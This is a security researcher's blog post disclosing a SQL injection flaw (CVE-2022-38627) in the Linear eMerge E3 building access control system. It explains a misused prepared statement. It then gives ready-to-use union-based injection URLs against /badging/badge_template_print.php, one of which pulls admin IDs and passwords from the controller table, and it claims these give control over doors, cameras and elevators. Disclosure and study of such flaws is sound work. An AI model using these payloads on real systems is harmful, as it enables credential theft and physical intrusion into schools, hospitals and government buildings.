.png)
1 year ago
107 BOOK THIS SPACE FOR AD
ARTICLE ADIntroduction:
In this research, I will show you how I managed to find this critical 0-day that allows me to control the entire enterprise building (doors, cameras, elevators, etc… ) in addition to that, I can collect employee data and add new employees who have permission to access the enterprise building, all of this is besides to the natural impact of a critical SQL injection vulnerability
Actually, in this research, you will see the implementation of hacking movies scenes but a real-life scenario
Summary of Linear eMerge E3 Series product:
The Linear eMerge E3 Series is one of the industry leading products in building management systems as it is one of the most widely used products in the industry which is used for control
School Districts and Campuses (K12 & Higher Ed)Corporate CampusesState/Local Government buildings (Civic Centers, City Hall, Police Stations, Jails, etc.)Public UtilitiesTransportation (Airports, Subway, Bus Depots)Places of Worship (Churches, Mega-Church campuses)Medical Facilities (Hospitals, Pharma, Bio Labs, etc.)And moreLet’s start the Static-Analysis:
I came across this endpoint /badging/badge_template_print.php so let’s take a look at the code
As you can see the developers take user input through the “idt” parameter and then pass it to the query using prepare statement which should prevent the SQL Injection
but wait a minute there is a wrong implementation of prepare statement here and to know what has gone wrong we need to understand what are (the prepare statement workflow) first
The prepared statement processing workflow passes through 7 phases
simply it passes the query to the database like this
$sth = $db->prepare(“SELECT * FROM “.dbtable.” where No = ?”);
as the question mark is called a parameter placeholder
So what happens under the prepared statement is that the query will be passed through 7 phases:
1- Parsing Phase: parsed for Syntax errors and misspelling checks to ensure the validity of the SQL query then
2- Semantics Check Phase: The Database Management System (DBMS) establishes the validity of the query. Does the specified columns and table exist? Does the user have privileges to execute this query?
3- Binding Phase: the database engine detects the placeholders, and the query is compiled with placeholders. The user-supplied data will be added later at (Placeholder replacement phase like this).
$sth->bindValue(1, $id, PDO::PARAM_INT);
4- Query Optimization Phase: The DBMS chooses the best algorithm for executing the query.
5- Cache Phase: The best algorithm is saved in the cache, so the next time when the same query is executed it will skip the first four phases and jump straight to the Placeholder replacement phase
6- Placeholder Replacement Phases: at this phase, the placeholders are replaced with the user’s data. However, the query is already pre-compiled (Binding), so the final query will not go through the compilation phase again. For this reason, the user-provided data will always be interpreted as a simple string and cannot modify the original query’s logic. which makes the query will be immune to SQL Injection vulnerabilities for that data.
7- Execution Phase:
$sth->execute();
then finally the query executed successfully
These are the phases that prepared statements pass through to prevent the SQL injection
So let’s retake a look at what happened here
the developer Put the $id parameter that comes from the user into the prepared statement and not bind Value as I have described above so if the user input parameter is something like that
?id=1 UNION SELECT * FROM User
then the $sth variable value will be like that
$db->prepare(“SELECT * FROM User where No=1 UNION SELECT * FROM User”)
so the prepared statement will take our input as part of the query (not considering it a bind value) and the user input will be passed through all Phases from Phase one which mean that the user input will be considered part of the query as the SQL compiler will compile it as a part of the query and will not be considered as a bind value because it passed in Query from the first phase, not at the sixth phases(placeholder replacement) and which will lead to successfully SQLI
$xml variable is load XML file by using the parameter “tpl”
First “if statement” forces us to load an XML file that contains <picture> tag anyway developers created this XML file “aa.xml” for that, so all we need to do is just put the file name in the “tpl” parameter ?tpl=aa.xml
The second “if statement” we need to make it false to execute else that will print the “ImageFile” column in the page to extract the database content
So in our exploitation, we need to concatenate the output on the ImageFile column as this is the possible way to extract the database
Exploitation:
As I have already access to the source code and database so I know that The ImageFile column was column number 12 out of 39 columns on the “User” table so we don’t need to exploit it as we exploit black-box SQL Injection
So we will exploit it using union-based payload so we will need to concatenate the output at column 12 and define the other 38 columns with a NULL value
/badging/badge_template_print.php?tpl=aa.xml&idt=1337 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,’ SWVersion:’||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from version
the output will be the software version from the version table so I have concatenated the output at column 12 which will make the output look like that
SWVersion:<software version will be printed here>
What about extracting admin credentials
/badging/badge_template_print.php?tpl=aa.xml&idt=1337 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,’ Admin-ID-is:’||id||’%20Admin-Password-is:’||password,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from controller
After getting the admin credentials i can log in with them to control the whole enterprise building from the web dashboard
Automation:
For detection of the vulnerability, I made this nuclei template to scan your bug bounty programs or your enterprise assets
You can find it on my Security Research Repository :
https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-38627
┌──(omar㉿kali)-[~]
└─$ nuclei -t CVE-2022–38627.yaml -l subdomains.txt
At this point, we just reached the end so I hope you guys enjoyed
Twitter: @OmarHashem666
Bengali (Bangladesh) · 
English (United States) ·